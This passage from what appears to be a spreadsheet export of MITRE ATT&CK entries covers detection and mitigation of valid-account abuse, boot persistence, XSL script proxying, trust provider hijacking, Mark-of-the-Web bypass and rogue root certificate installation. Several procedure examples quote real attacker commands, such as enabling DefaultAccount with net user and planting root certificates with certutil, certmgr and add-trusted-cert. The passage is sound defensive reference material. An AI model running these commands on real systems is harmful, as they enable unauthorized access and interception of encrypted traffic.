- For Linux, auditing frameworks that support File Integrity Monitoring (FIM), including the audit daemon (auditd), can be used to alert on changes to files that store login information. These files include: &lt;code&gt;/etc/login.defs&lt;/code&gt;,&lt;code&gt; /etc/securetty&lt;/code&gt;,&lt;code&gt; /var/log/faillog&lt;/code&gt;,&lt;code&gt; /var/log/lastlog&lt;/code&gt;,&lt;code&gt; /var/log/tallylog&lt;/code&gt;.
- For MacOS, auditing frameworks that support capturing information on user logins, such as OSQuery, can be used to audit user account logins and authentications. 
Multi-factor Authentication
Integrating multi-factor authentication (MFA) as part of organizational policy can greatly reduce the risk of an adversary gaining control of valid credentials that may be used for additional tactics such as initial access, lateral movement, and collecting information. MFA can also be used to restrict access to cloud resources and APIs.
Privileged Account Management
Audit domain account permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account. Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled and use of accounts is segmented, as this is often equivalent to having a local administrator account with the same password on all systems. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. Limit credential overlap across systems to prevent access if account credentials are obtained.
User Training
Applications may send push notifications to verify a login as a form of multi-factor authentication (MFA). Train users to only accept valid push notifications and to report suspicious push notifications.
Night Dragon
During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used domain accounts to gain further access to victim systems.(Citation: McAfee Night Dragon)
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used compromised domain administrator credentials as part of their lateral movement.(Citation: Cybereason OperationCuckooBees May 2022) 
Operation Ghost
For [Operation Ghost](https://attack.mitre.org/campaigns/C0023), [APT29](https://attack.mitre.org/groups/G0016) used stolen administrator credentials for lateral movement on compromised networks.(Citation: ESET Dukes October 2019)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used domain credentials, including domain admin, for lateral movement and privilege escalation.(Citation: FoxIT Wocao December 2019)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used domain administrators' accounts to help facilitate lateral movement on compromised networks.(Citation: CrowdStrike StellarParticle January 2022)
APT3
[APT3](https://attack.mitre.org/groups/G0022) leverages valid accounts after gaining credentials for use within the victim domain.(Citation: Symantec Buckeye)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used compromised domain accounts to gain access to the target environment.(Citation: NCC Group Chimera January 2021)
Indrik Spider
[Indrik Spider](https://attack.mitre.org/groups/G0119) has collected credentials from infected systems, including domain accounts.(Citation: Crowdstrike Indrik November 2018)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has used domain administrator accounts after dumping LSASS process memory.(Citation: DFIR Phosphorus November 2021)
Naikon
[Naikon](https://attack.mitre.org/groups/G0019) has used administrator credentials for lateral movement in compromised networks.(Citation: Bitdefender Naikon April 2021)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has used stolen credentials to access administrative accounts within the domain.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: Microsoft Prestige ransomware October 2022)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has used stolen domain admin accounts to compromise additional hosts.(Citation: IBM TA505 April 2020)
Threat Group-1314
[Threat Group-1314](https://attack.mitre.org/groups/G0028) actors used compromised domain credentials for the victim's endpoint management platform, Altiris, to move laterally.(Citation: Dell TG-1314)
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has used compromised domain accounts to authenticate to devices on compromised networks.(Citation: Microsoft Volt Typhoon May 2023)(Citation: Secureworks BRONZE SILHOUETTE May 2023)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used administrative accounts, including Domain Admin, to move laterally within a victim network.(Citation: FireEye KEGTAP SINGLEMALT October 2020)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can use known credentials to run commands and spawn processes as a domain user account.(Citation: cobaltstrike manual)(Citation: CobaltStrike Daddy May 2017)(Citation: Cobalt Strike Manual 4.3 November 2020)
CreepySnail
[CreepySnail](https://attack.mitre.org/software/S1024) can use stolen credentials to authenticate on target networks.(Citation: Microsoft POLONIUM June 2022)
Ryuk
[Ryuk](https://attack.mitre.org/software/S0446) can use stolen domain admin accounts to move laterally within a victim domain.(Citation: ANSSI RYUK RANSOMWARE)
Shamoon
If [Shamoon](https://attack.mitre.org/software/S0140) cannot access shares using current privileges, it attempts access using hard coded, domain-specific credentials gathered earlier in the intrusion.(Citation: FireEye Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) attempts to access network resources with a domain account’s credentials.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments in command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration.
Drive Modification
Monitor for changes to MBR and VBR as they occur for indicators for suspicious activity and further analysis. Take snapshots of MBR and VBR and compare against known good samples.
Driver Metadata
Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation
Firmware Modification
Monitor for changes made on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI
Network Connection Creation
Monitor for newly constructed network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.
OS API Execution
Monitor for API calls that may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. Disk check, forensic utilities, and data from device drivers (i.e. API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014)
Boot Integrity
Use Trusted Platform Module technology and a secure or trusted boot process to prevent system integrity from being compromised. Check the integrity of the existing BIOS or EFI to determine if it is vulnerable to modification. (Citation: TCG Trusted Platform Module) (Citation: TechNet Secure Boot Process)
Privileged Account Management
Ensure proper permissions are in place to help prevent adversary access to privileged accounts necessary to perform these actions
Update Software
Patch the BIOS and EFI as necessary.
</t>
  </si>
  <si>
    <t xml:space="preserve">Logon Session Creation
Monitor for newly constructed logon behavior across default accounts that have been activated or logged into. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
User Account Authentication
Monitor for an attempt by a user to gain access to a network or computing resource, often by providing credentials
Password Policies
Applications and appliances that utilize default username and password should be changed immediately after the installation, and before deployment to a production environment. (Citation: US-CERT Alert TA13-175A Risks of Default Passwords on the Internet)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has leveraged default credentials for authenticating myWebMethods (WMS) and QLogic web management interface to gain initial access.(Citation: Sygnia Elephant Beetle Jan 2022)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) enabled and used the default system managed account, DefaultAccount, via `"powershell.exe" /c net user DefaultAccount /active:yes` to connect to a targeted Exchange server over RDP.(Citation: DFIR Phosphorus November 2021)
HyperStack
[HyperStack](https://attack.mitre.org/software/S0537) can use default credentials to connect to IPC$ shares on remote machines.(Citation: Accenture HyperStack October 2020)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) infected WinCC machines via a hardcoded database server password.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
</t>
  </si>
  <si>
    <t xml:space="preserve">Module Load
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.
Process Creation
Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded. The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
Execution Prevention
If msxsl.exe is unnecessary, then block its execution to prevent abuse by adversaries.
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used a remote XSL script to download a Base64-encoded DLL custom downloader.(Citation: ESET Lazarus Jun 2020)
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) used msxsl.exe to bypass AppLocker and to invoke Jscript code from an XSL file.(Citation: Talos Cobalt Group July 2018)
Higaisa
[Higaisa](https://attack.mitre.org/groups/G0126) used an XSL file to run VBScript code.(Citation: PTSecurity Higaisa 2020)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain. (Citation: Cybereason Astaroth Feb 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">Logon Session Creation
Monitor for newly constructed logon behavior that may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
Logon Session Metadata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User Account Authentication
Monitor for an attempt by a user that may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. 
Account Use Policies
Use conditional access policies to block logins from non-compliant devices or from outside defined organization IP ranges.(Citation: Microsoft Common Conditional Access Policies)
Active Directory Configuration
Disable legacy authentication, which does not support MFA, and require the use of modern authentication protocols instead.
Application Developer Guidance
Ensure that applications do not store sensitive data or credentials insecurely. (e.g. plaintext credentials in code, published credentials in repositories, or credentials in public cloud storage).
Password Policies
Applications and appliances that utilize default username and password should be changed immediately after the installation, and before deployment to a production environment.(Citation: US-CERT Alert TA13-175A Risks of Default Passwords on the Internet) When possible, applications that use SSH keys should be updated periodically and properly secured.
Policies should minimize (if not eliminate) reuse of passwords between different user accounts, especially employees using the same credentials for personal accounts that may not be defended by enterprise security resources.
Privileged Account Management
Audit domain and local accounts as well as their permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account. (Citation: TechNet Credential Theft) (Citation: TechNet Least Privilege) These audits should also include if default accounts have been enabled, or if new local accounts are created that have not be authorized. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. (Citation: Microsoft Securing Privileged Access)
User Account Management
Regularly audit user accounts for activity and deactivate or remove any that are no longer needed.
User Training
Applications may send push notifications to verify a login as a form of multi-factor authentication (MFA). Train users to only accept valid push notifications and to report suspicious push notifications.
2015 Ukraine Electric Power Attack
During the [2015 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0028), [Sandworm Team](https://attack.mitre.org/groups/G0034) used valid accounts on the corporate network to escalate privileges, move laterally, and establish persistence within the corporate network. (Citation: Ukraine15 - EISAC - 201603)
Night Dragon
During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used compromised VPN accounts to gain access to victim systems.(Citation: McAfee Night Dragon)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used valid VPN credentials to gain initial access.(Citation: FoxIT Wocao December 2019)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used different compromised credentials for remote access and to move laterally.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2021)(Citation: Cybersecurity Advisory SVR TTP May 2021)
APT18
[APT18](https://attack.mitre.org/groups/G0026) actors leverage legitimate credentials to log into external remote services.(Citation: RSA2017 Detect and Respond Adair)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has used legitimate credentials to gain initial access, maintain access, and exfiltrate data from a victim network. The group has specifically used credentials stolen through a spearphishing email to login to the DCCC network. The group has also leveraged default manufacturer's passwords to gain initial access to corporate networks via IoT devices such as a VOIP phone, printer, and video decoder.(Citation: Trend Micro Pawn Storm April 2017)(Citation: DOJ GRU Indictment Jul 2018)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has used a compromised account to access an organization's VPN infrastructure.(Citation: Mandiant APT29 Microsoft 365 2022)
APT33
[APT33](https://attack.mitre.org/groups/G0064) has used valid accounts for initial access and privilege escalation.(Citation: FireEye APT33 Webinar Sept 2017)(Citation: FireEye APT33 Guardrail)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used stolen credentials to compromise Outlook Web Access (OWA).(Citation: FireEye APT39 Jan 2019)
APT41
[APT41](https://attack.mitre.org/groups/G0096) used compromised credentials to log on to other systems.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)
Axiom
[Axiom](https://attack.mitre.org/groups/G0001) has used previously compromised administrative accounts to escalate privileges.(Citation: Novetta-Axiom)
Carbanak
[Carbanak](https://attack.mitre.org/groups/G0008) actors used legitimate credentials of banking employees to perform operations that sent them millions of dollars.(Citation: Kaspersky Carbanak)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used a valid account to maintain persistence via scheduled task.(Citation: Cycraft Chimera April 2020)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has compromised user credentials and used valid accounts for operations.(Citation: US-CERT TA18-074A)(Citation: Gigamon Berserk Bear October 2021)(Citation: CISA AA20-296A Berserk Bear December 2020)
FIN10
[FIN10](https://attack.mitre.org/groups/G0051) has used stolen credentials to connect remotely to victim networks using VPNs protected with only a single factor.(Citation: FireEye FIN10 June 2017)
FIN4
[FIN4](https://attack.mitre.org/groups/G0085) has used legitimate credentials to hijack email communications.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)
FIN5
[FIN5](https://attack.mitre.org/groups/G0053) has used legitimate VPN, RDP, Citrix, or VNC credentials to maintain access to a victim environment.(Citation: FireEye Respond Webinar July 2017)(Citation: DarkReading FireEye FIN5 Oct 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)
FIN6
To move laterally on a victim network, [FIN6](https://attack.mitre.org/groups/G0037) has used credentials stolen from various systems on which it gathered usernames and password hashes.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)(Citation: Visa FIN6 Feb 2019)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has harvested valid administrative credentials for lateral movement.(Citation: CrowdStrike Carbon Spider August 2021)
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has used valid accounts for persistence and lateral movement.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has used valid credentials with various services during lateral movement.(Citation: CISA AA20-259A Iran-Based Actor September 2020)
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) leveraged valid accounts to maintain access to a victim network.(Citation: Cybereason Soft Cell June 2019)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) has used credential dumpers or stealers to obtain legitimate credentials, which they used to gain access to victim accounts.(Citation: Microsoft NICKEL December 2021)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has used compromised credentials and/or session tokens to gain access into a victim's VPN, VDI, RDP, and IAMs.(Citation: MSTIC DEV-0537 Mar 2022)(Citation: NCC Group LAPSUS Apr 2022)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has used administrator credentials to gain access to restricted network segments.(Citation: Kaspersky ThreatNeedle Feb 2021)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has obtained valid accounts to gain initial access.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Accenture MUDCARP March 2019)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used compromised credentials to access other systems on a victim network.(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: Crowdstrike GTR2020 Mar 2020)
POLONIUM
[POLONIUM](https://attack.mitre.org/groups/G1005) has used valid compromised credentials to gain access to victim environments.(Citation: Microsoft POLONIUM June 2022)
PittyTiger
[PittyTiger](https://attack.mitre.org/groups/G0011) attempts to obtain legitimate credentials during operations.(Citation: Bizeul 2014)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) have used previously acquired legitimate credentials prior to attacks.(Citation: US-CERT Ukraine Feb 2016)
Silence
[Silence](https://attack.mitre.org/groups/G0091) has used compromised credentials to log on to other systems and escalate privileges.(Citation: Group IB Silence Sept 2018)
Silent Librarian
[Silent Librarian](https://attack.mitre.org/groups/G0122) has used compromised credentials to obtain unauthorized access to online accounts.(Citation: DOJ Iran Indictments March 2018)
Suckfly
[Suckfly](https://attack.mitre.org/groups/G0039) used legitimate account credentials that they dumped to navigate the internal victim network as though they were the legitimate account owner.(Citation: Symantec Suckfly May 2016)
TEMP.Veles
[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used compromised VPN accounts.(Citation: FireEye TRITON 2019)	
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) actors obtain legitimate credentials using a variety of methods and use them to further lateral movement on victim networks.(Citation: Dell TG-3390)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used valid credentials for privileged accounts with the goal of accessing domain controllers.(Citation: CrowdStrike Grim Spider May 2019)(Citation: Mandiant FIN12 Oct 2021)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has used valid accounts including shared between Managed Service Providers and clients to move between the two environments.(Citation: PWC Cloud Hopper April 2017)(Citation: Symantec Cicada November 2020)(Citation: District Court of NY APT10 Indictment December 2018)(Citation: Securelist APT10 March 2021)
Dtrack
[Dtrack](https://attack.mitre.org/software/S0567) used hard-coded credentials to gain access to a network share.(Citation: CyberBit Dtrack)
Duqu
Adversaries can instruct [Duqu](https://attack.mitre.org/software/S0038) to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials (via keylogging or other means). The remote host is then infected by using the compromised credentials to schedule a task on remote machines that executes the malware.(Citation: Symantec W32.Duqu)
Industroyer
[Industroyer](https://attack.mitre.org/software/S0604) can use supplied user credentials to execute processes and stop services.(Citation: ESET Industroyer)
Kinsing
[Kinsing](https://attack.mitre.org/software/S0599) has used valid SSH credentials to access remote hosts.(Citation: Aqua Kinsing April 2020)
Linux Rabbit
[Linux Rabbit](https://attack.mitre.org/software/S0362) acquires valid SSH accounts through brute force. (Citation: Anomali Linux Rabbit 2018)
SeaDuke
Some [SeaDuke](https://attack.mitre.org/software/S0053) samples have a module to extract email from Microsoft Exchange servers using compromised credentials.(Citation: Symantec Seaduke 2015)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Modification
Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries.(Citation: SpectorOps Subverting Trust Sept 2017) Also analyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure “Hide Microsoft Entries” and “Hide Windows Entries” are both deselected.(Citation: SpectorOps Subverting Trust Sept 2017)
Module Load
Enable CryptoAPI v2 (CAPI) event logging (Citation: Entrust Enable CAPI2 Aug 2017) to monitor and analyze error events related to failed trust validation (Event ID 81, though this event can be subverted by hijacked trust provider components) as well as any other provided information events (ex: successful validations). Code Integrity event logging may also provide valuable indicators of malicious SIP or trust provider loads, since protected processes that attempt to load a maliciously-crafted trust validation component will likely fail (Event ID 3033). (Citation: SpectorOps Subverting Trust Sept 2017)
Windows Registry Key Modification
Enable the Registry Global Object Access Auditing (Citation: Microsoft Registry Auditing Aug 2016) setting in the Advanced Security Audit policy to apply a global system access control list (SACL) and event auditing on modifications to Registry values (sub)keys related to SIPs and trust providers:(Citation: Microsoft Audit Registry July 2012)
* &lt;code&gt;HKLM\SOFTWARE\Microsoft\Cryptography\OID&lt;/code&gt;
* &lt;code&gt;HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID&lt;/code&gt;
* &lt;code&gt;HKLM\SOFTWARE\Microsoft\Cryptography\Providers\Trust&lt;/code&gt;
* &lt;code&gt;HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust&lt;/code&gt;
**Note:** As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [Regsvr32](https://attack.mitre.org/techniques/T1218/010).(Citation: SpectorOps Subverting Trust Sept 2017)
Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries.(Citation: SpectorOps Subverting Trust Sept 2017)
Execution Prevention
Enable application control solutions such as AppLocker and/or Device Guard to block the loading of malicious SIP DLLs.
Restrict File and Directory Permissions
Restrict storage and execution of SIP DLLs to protected directories, such as C:\\Windows, rather than user directories.
Restrict Registry Permissions
Ensure proper permissions are set for Registry hives to prevent users from modifying keys related to SIP and trust provider components. Components may still be able to be hijacked to suitable functions already present on disk if malicious modifications to Registry keys are not prevented. 
</t>
  </si>
  <si>
    <t xml:space="preserve">File Creation
Monitor compressed/archive and image files downloaded from the Internet as the contents may not be tagged with the MOTW. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.
File Metadata
Monitor files (especially those downloaded from untrusted locations) for MOTW attributes. Also consider inspecting and scanning file formats commonly abused to bypass MOTW (ex: .arj, .gzip, .iso, .vhd).
Disable or Remove Feature or Program
Consider disabling auto-mounting of disk image files (i.e., .iso, .img, .vhd, and .vhdx). This can be achieved by modifying the Registry values related to the Windows Explorer file associations in order to disable the automatic Explorer "Mount and Burn" dialog for these file extensions. Note: this will not deactivate the mount functionality itself.(Citation: GitHub MOTW)
Execution Prevention
Consider blocking container file types at web and/or email gateways. Consider unregistering container file extensions in Windows File Explorer.(Citation: Dormann Dangers of VHD 2019)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has embedded ISO images and VHDX files in HTML to evade Mark-of-the-Web.(Citation: ESET T3 Threat Report 2021)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has used .iso files to deploy malicious .lnk files.(Citation: TrendMicro TA505 Aug 2019)
Amadey
[Amadey](https://attack.mitre.org/software/S1025) has modified the `:Zone.Identifier` in the ADS area to zero.(Citation: Korean FSI TA505 2020)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) has been packaged in ISO files in order to bypass Mark of the Web (MOTW) security measures.(Citation: Trend Micro Black Basta October 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor for commands, such as &lt;code&gt;security add-trusted-cert&lt;/code&gt; (macOS) or &lt;code&gt;certutil -addstore&lt;/code&gt; (Windows), that can be used to install root certificates. A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. (Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through &lt;code&gt;authroot.stl&lt;/code&gt;. (Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (&lt;code&gt;sigcheck[64].exe -tuv&lt;/code&gt;) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List. (Citation: Microsoft Sigcheck May 2017)
Process Creation
Monitor for processes, such as &lt;code&gt;certmgr.exe&lt;/code&gt; (macOS) or &lt;code&gt;certutil.exe&lt;/code&gt; (Windows), that can be used to install root certificates. A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. (Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through &lt;code&gt;authroot.stl&lt;/code&gt;. (Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (&lt;code&gt;sigcheck[64].exe -tuv&lt;/code&gt;) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List. (Citation: Microsoft Sigcheck May 2017)
&lt;h4&gt;Analytic 1 - Attempt to Add Certificate to Untrusted Store&lt;/h4&gt;
&lt;code&gt; addstore_commands = filter processes where (
  exe =”C:\Windows\System32\certutil.exe” AND command_line="*-addstore*” )&lt;/code&gt;
Windows Registry Key Creation
Monitoring the creation of (sub)keys within the Windows Registry may reveal malicious root certificate installation. Installed root certificates are located in the Registry under &lt;code&gt;HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\&lt;/code&gt; and &lt;/code&gt;[HKLM or HKCU]\Software[\Policies\]\Microsoft\SystemCertificates\Root\Certificates\&lt;/code&gt;. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison: (Citation: Tripwire AppUNBlocker)
* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25
* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85
* 3B1EFD3A66EA28B16697394703A72CA340A05BD5
* 7F88CD7223F3C813818C994614A89C99FA3B5247
* 8F43288AD272F3103B6FB1428485EA3014C0BCFE
* A43489159A520F0D93D032CCAF37E7FE20A8B419
* BE36A4562FB2EE05DBB3D32323ADF445084ED656
* CDD4EEAE6000AC7F40C3802C171E30148030C072
Windows Registry Key Modification
Monitoring changes to the Windows Registry may reveal malicious root certificate installation. Installed root certificates are located in the Registry under &lt;code&gt;HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\&lt;/code&gt; and &lt;/code&gt;[HKLM or HKCU]\Software[\Policies\]\Microsoft\SystemCertificates\Root\Certificates\&lt;/code&gt;. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison: (Citation: Tripwire AppUNBlocker)
* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25
* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85
* 3B1EFD3A66EA28B16697394703A72CA340A05BD5
* 7F88CD7223F3C813818C994614A89C99FA3B5247
* 8F43288AD272F3103B6FB1428485EA3014C0BCFE
* A43489159A520F0D93D032CCAF37E7FE20A8B419
* BE36A4562FB2EE05DBB3D32323ADF445084ED656
* CDD4EEAE6000AC7F40C3802C171E30148030C072
Operating System Configuration
Windows Group Policy can be used to manage root certificates and the &lt;code&gt;Flags&lt;/code&gt; value of &lt;code&gt;HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots&lt;/code&gt; can be set to 1 to prevent non-administrator users from making further root installations into their own HKCU certificate store. (Citation: SpectorOps Code Signing Dec 2017)
Software Configuration
HTTP Public Key Pinning (HPKP) is one method to mitigate potential [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) situations where and adversary uses a mis-issued or fraudulent certificate to intercept encrypted communications by enforcing use of an expected certificate. (Citation: Wikipedia HPKP)
Dok
[Dok](https://attack.mitre.org/software/S0281) installs a root certificate to aid in [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) actions using the command &lt;code&gt;add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /tmp/filename&lt;/code&gt;.(Citation: objsee mac malware 2017)(Citation: hexed osx.dok analysis 2019)
Hikit
[Hikit](https://attack.mitre.org/software/S0009) uses &lt;code&gt;certmgr.exe -add GlobalSign.cer -c -s -r localMachine Root&lt;/code&gt; and &lt;code&gt;certmgr.exe -add GlobalSign.cer -c -s -r localMachineTrustedPublisher&lt;/code&gt; to install a self-generated certificate to the local trust store as a root CA and Trusted Publisher.(Citation: FireEye HIKIT Rootkit Part 2)
RTM
[RTM](https://attack.mitre.org/software/S0148) can add a certificate to the Windows store.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)
certutil
[certutil](https://attack.mitre.org/software/S0160) can be used to install browser root certificates as a precursor to performing [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) between connections to banking websites. Example command: &lt;code&gt;certutil -addstore -f -user ROOT ProgramData\cert512121.der&lt;/code&gt;.(Citation: Palo Alto Retefe)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor and investigate attempts to modify extended file attributes with utilities such as &lt;code&gt;xattr&lt;/code&gt;. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. 
File Metadata
Review &lt;code&gt;false&lt;/code&gt; values under the &lt;code&gt;LSFileQuarantineEnabled&lt;/code&gt; entry in an application's &lt;code&gt;Info.plist&lt;/code&gt; file (required by every application). &lt;code&gt;false&lt;/code&gt; under &lt;code&gt;LSFileQuarantineEnabled&lt;/code&gt; indicates that an application does not use the quarantine flag. Unsandboxed applications with an unspecified &lt;code&gt;LSFileQuarantineEnabled&lt;/code&gt; entry will default to not setting the quarantine flag.
QuarantineEvents is a SQLite database containing a list of all files assigned the &lt;code&gt;com.apple.quarantine&lt;/code&gt; attribute, located at &lt;code&gt;~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2&lt;/code&gt;. Each event contains the corresponding UUID, timestamp, application, Gatekeeper score, and decision if it was allowed. (Citation: TheEclecticLightCompany Quarantine and the flag)
File Modification
The removal of the &lt;code&gt;com.apple.quarantine&lt;/code&gt; flag by a user instead of the operating system is a suspicious action and should be examined further. Also monitor software update frameworks that may strip this flag when performing updates.
Process Creation
Monitor and investigate attempts to modify extended file attributes with utilities such as &lt;code&gt;xattr&lt;/code&gt;. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. 
Execution Prevention
System settings can prevent applications from running that haven't been downloaded through the Apple Store which can help mitigate some of these issues. 
CoinTicker
[CoinTicker](https://attack.mitre.org/software/S0369) downloads the EggShell mach-o binary using curl, which does not set the quarantine flag.(Citation: CoinTicker 2019)
MacMa
[MacMa](https://attack.mitre.org/software/S1016) has removed the `com.apple.quarantineattribute` from the dropped file, `$TMPDIR/airportpaird`.(Citation: ESET DazzleSpy Jan 2022)
OSX/Shlayer
